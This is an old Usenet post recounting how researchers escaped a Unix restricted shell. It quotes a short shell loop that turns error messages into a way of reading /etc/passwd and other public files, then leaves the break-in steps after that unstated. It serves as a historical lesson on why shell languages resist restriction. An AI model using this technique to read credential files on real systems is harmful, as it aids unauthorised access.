Restricted shell isn't! (was: Restricted shell)

[Randal L. Schwartz @ Stonehenge]

In article <366 at siswat.UUCP>, buck at siswat (A. Lester Buck) writes:
| [stuff about setting PATH in an 'sh -r'...]
|			     Even this setup is described as "not
| really very secure."  We can all imagine some interesting attacks.
| Just nothing as trivial as "$ sh".

I think it was research!bwk (Kernighan) that posted an article about
four years ago that detailed the following scenario:

He and a cohort were provided a login on another Bell Labs UNIX box
(running V7, or something non-BSD-like) with the following
restrictions:

(1) Login shell = /bin/rsh
(2) PATH= (that is, nothing in the PATH)
(3) non-writable, empty (but existant) $HOME directory
(4) No other hints

They said that they broke root in under an hour.  Here was their
method of attack:

(1) login
(2) enter:
	IFS=
	while read a
	do $a
	done </etc/passwd
(3) shell responds with:
root:asdfasdf123:0:0:The Root:/:/bin/sh: restricted
nextuser:12341234asd:1:1:A Luser:/usr/nextuser:/bin/csh: restricted
...

In other words, out comes the /etc/passwd file.  Now, apply standard
break-in techniques. :-) Essentially, you could read any public file
on the system with this built-in cat(1).

So, the summary was something like "something as powerful as the
language of the shell cannot be restricted sufficiently to warrant its
use in a limited environment and still be useful."  (A very bad
paraphrase... someone wanna dredge that article up if they have it? :-)
-- 
Randal L. Schwartz, Stonehenge Consulting Services (503)777-0095
on contract to BiiN Technical Information Services (for now :-),
in a former Intel building in Hillsboro, Oregon, USA.
<merlyn at intelob.biin.com> or ...!tektronix!inteloa[!intelob]!merlyn
SOME MAILERS REQUIRE <merlyn at intelob.intel.com> GRRRRR!
Standard disclaimer: I *am* my employer!